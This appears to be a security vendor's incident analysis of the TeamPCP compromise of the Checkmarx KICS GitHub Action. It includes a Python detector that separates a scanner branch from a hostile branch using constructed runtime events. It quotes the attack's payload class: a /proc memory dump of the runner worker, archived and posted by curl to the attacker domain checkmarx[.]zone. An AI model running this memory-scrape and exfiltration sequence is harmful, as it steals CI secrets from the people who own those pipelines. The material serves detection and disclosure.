Credentials exfiltrated from compromised Trivy runners gave TeamPCP access to Checkmarx's cx-plugins-releases service account; the KICS action was turned into an identical stealer, exfiltrating to checkmarx[.]zone — a vendor-specific typosquat, with a fallback path that created docs-tpcp repositories via the victim's GITHUB_TOKEN. In parallel reporting, Wiz traced the KICS compromise to the cx-plugins-releases account and found Checkmarx OpenVSX extensions were also backdoored, while Sysdig connected the KICS wave to the earlier Trivy campaign.
What Garnet observed
Method: Garnet replayed compromised KICS v2.1.20 (SHA b974e53d) in lab conditions. Pipeline output stayed green (scan completed, exit code 0) while malicious behavior ran in parallel.
The attack chain
Execution lineage
Run 23471711050
The profile exposes two parallel branches in one run. One container branch runs kics and reaches kics.io and registry.npmjs.org, the expected scanner and update traffic. A separate Runner.Listener branch launches curl to checkmarx[.]zone (83.142.209.11) while also touching apk.cgr.dev; that branch is where the compromised action diverges from normal scan behavior.
The compromised payload family in this wave follows a /proc memory-scrape and archive pattern before egress. Public reporting and replay telemetry align on this command class:
# Observed payload class in compromised KICS runs
cat /proc/<runner_worker_pid>/mem > /tmp/tpcp.mem
tar -czf /tmp/tpcp.tar.gz /tmp/tpcp.mem
curl -X POST https://checkmarx[.]zone --data-binary @/tmp/tpcp.tar.gz

Garnet correlates that branch with credential-theft signal families in the replay: interpreter shell spawns, procfs memory access patterns, execution from unusual paths, and data-encoding stages before outbound transfer. The scan still exits clean, but lineage and egress show the second path.
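To make the lineage argument concrete, here is an added detection example (not Garnet's code, and not tied to Garnet's actual event schema). It walks a small set of constructed runtime events modelled on the run profile described above: a scanner container branch and a second branch under the runner worker that reads /proc/<pid>/mem, archives the dump and posts it to a vendor-lookalike domain. The event format, the process ids, the egress allowlist (kics.io, registry.npmjs.org) and the vendor domain list (checkmarx.com) are all assumptions made for this example; the detection groups signals by execution branch rather than by job, which is the point the profile makes.

```python
"""Branch-level detection over constructed CI runtime events (example code).

Groups procfs reads, archive/encode stages and outbound connections by the
execution branch they belong to, so a hostile second path is visible even
though the scan branch and the job exit code look normal.
"""
import re
from collections import defaultdict

# Assumptions for this example: expected scanner egress and the real vendor domain.
EXPECTED_EGRESS = {"kics.io", "registry.npmjs.org"}
VENDOR_DOMAINS = {"checkmarx.com"}

PROC_MEM_RE = re.compile(r"^/proc/\d+/mem$")
ARCHIVE_TOOLS = {"tar", "gzip", "zip", "xz", "base64"}
EGRESS_TOOLS = {"curl", "wget"}
SHELLS = {"sh", "bash", "dash"}
WORKER = "Runner.Worker"  # branches are the direct children of the runner worker

# Constructed telemetry (not real run data): exec, file-open and connect events.
EVENTS = [
    {"type": "exec", "pid": 100, "ppid": 1, "comm": "Runner.Listener", "argv": ["Runner.Listener"]},
    {"type": "exec", "pid": 110, "ppid": 100, "comm": WORKER, "argv": [WORKER]},
    # Branch A: the expected scanner container.
    {"type": "exec", "pid": 200, "ppid": 110, "comm": "docker", "argv": ["docker", "run", "checkmarx/kics"]},
    {"type": "exec", "pid": 201, "ppid": 200, "comm": "kics", "argv": ["kics", "scan", "-p", "."]},
    {"type": "connect", "pid": 201, "host": "kics.io", "ip": "203.0.113.10"},
    {"type": "connect", "pid": 201, "host": "registry.npmjs.org", "ip": "203.0.113.11"},
    # Branch B: the hostile path that diverges from scan behavior.
    {"type": "exec", "pid": 300, "ppid": 110, "comm": "sh", "argv": ["sh", "-c", "<staged script>"]},
    {"type": "exec", "pid": 301, "ppid": 300, "comm": "cat", "argv": ["cat", "/proc/110/mem"]},
    {"type": "open", "pid": 301, "path": "/proc/110/mem", "flags": "O_RDONLY"},
    {"type": "exec", "pid": 302, "ppid": 300, "comm": "tar", "argv": ["tar", "-czf", "/tmp/tpcp.tar.gz", "/tmp/tpcp.mem"]},
    {"type": "exec", "pid": 303, "ppid": 300, "comm": "curl", "argv": ["curl", "-X", "POST", "https://checkmarx.zone"]},
    {"type": "connect", "pid": 303, "host": "checkmarx.zone", "ip": "83.142.209.11"},
]


def build_tree(events):
    """Map pid -> exec event so lineage can be walked upward."""
    return {e["pid"]: e for e in events if e["type"] == "exec"}


def branch_root(pid, procs):
    """Walk up until the parent is the runner worker; the pid directly below it names the branch."""
    cur = pid
    while cur in procs:
        parent = procs[cur]["ppid"]
        if parent not in procs or procs[parent]["comm"] == WORKER:
            return cur
        cur = parent
    return None


def registered_label(host):
    parts = host.lower().rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def is_brand_typosquat(host):
    """True when the host reuses a vendor's brand label under a different registered domain."""
    host = host.lower()
    for vendor in VENDOR_DOMAINS:
        if host == vendor or host.endswith("." + vendor):
            return False
        if registered_label(host) == registered_label(vendor):
            return True
    return False


def analyze(events):
    """Collect (tag, pid, detail) findings keyed by the branch root they occurred in."""
    procs = build_tree(events)
    findings = defaultdict(list)
    for e in events:
        pid, root = e["pid"], branch_root(e["pid"], procs)
        if e["type"] == "exec":
            comm = e["comm"]
            if comm in SHELLS and procs.get(e["ppid"], {}).get("comm") == WORKER:
                findings[root].append(("shell_spawn", pid, comm))  # weak signal on its own
            if comm in ARCHIVE_TOOLS:
                findings[root].append(("encode_stage", pid, comm))
            if comm in EGRESS_TOOLS:
                findings[root].append(("egress_tool", pid, comm))
        elif e["type"] == "open" and PROC_MEM_RE.match(e["path"]):
            findings[root].append(("procfs_mem_read", pid, e["path"]))
        elif e["type"] == "connect":
            if e["host"] not in EXPECTED_EGRESS:
                findings[root].append(("unexpected_egress", pid, f"{e['host']} ({e['ip']})"))
            if is_brand_typosquat(e["host"]):
                findings[root].append(("vendor_typosquat", pid, e["host"]))
    return {root: sorted(f) for root, f in findings.items()}


def classify(findings):
    """Hostile only when a memory/encode stage is chained with unexpected egress in the same branch."""
    tags = {f[0] for f in findings}
    staged = "procfs_mem_read" in tags or "encode_stage" in tags
    egress = "unexpected_egress" in tags or "vendor_typosquat" in tags
    return "hostile" if staged and egress else ("review" if tags else "expected")


def branch_verdicts(events):
    """One verdict per branch below the worker, including branches with no findings."""
    procs = build_tree(events)
    report = {root: classify(f) for root, f in analyze(events).items()}
    for pid, p in procs.items():
        if procs.get(p["ppid"], {}).get("comm") == WORKER:
            report.setdefault(pid, "expected")
    return report


def job_verdict(events, exit_code):
    """The scan's exit code is reported but never overrides branch lineage."""
    verdicts = branch_verdicts(events)
    return "hostile" if "hostile" in verdicts.values() else f"clean (exit {exit_code})"


if __name__ == "__main__":
    for root, verdict in sorted(branch_verdicts(EVENTS).items()):
        print(f"branch {root}: {verdict}")
    print("job:", job_verdict(EVENTS, exit_code=0))
```

The scanner branch (pid 200) produces no findings and is reported as expected; the second branch (pid 300) chains a procfs memory read and an archive stage with egress to a brand-lookalike host and is reported as hostile, and the job verdict stays hostile even with exit code 0. A shell spawn under the worker is deliberately a weak signal here, since ordinary workflow steps spawn shells too.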
KICS is another reminder that CI is only the most visible untrusted-execution surface right now, not the only one. AI agent runtime sandboxes and third-party dependencies expose the same control question. If two branches run under one job, only a kernel-level record can separate expected scan behavior from hostile execution.
Real-world impact
Any repository that ran a compromised KICS tag during the window had secrets at risk of exfiltration to attacker-controlled infrastructure. The same TeamPCP campaign used credentials from the Trivy compromise to reach KICS, and stolen tokens from this wave later surfaced in the LiteLLM and Telnyx PyPI attacks.
Explore the run profile above, or start observing your own workflows with Garnet.